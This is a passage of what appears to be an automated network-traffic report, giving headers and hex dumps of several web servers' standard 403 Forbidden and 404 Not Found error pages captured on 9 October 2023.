0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:52:40 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nA1jVv%2BfoTmgzYftEI%2F1ddsSu87d6Od4OClCf67wdntqeA1l0mcgqKBniN%2FUCgUKQSJp%2FzXQ9CpPQM79pqW0p8PWYXW6CWj3HyXhQW9puDxLfiIaNjjUU2cD89Lk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371aa0fad37cf2-LAXalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 15e5<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 09 Oct 2023 13:52:26 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:25 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=4, max=350Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:25 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:52:25 GMTContent-Type: text/htmlContent-Length: 75193Connection: keep-aliveVary: Accept-EncodingETag: "65142bc3-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Mon, 09 Oct 2023 13:52:26 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: nUQ0wtoa/6RL4jG8mData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:26 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:26 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 09 Oct 2023 13:52:32 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
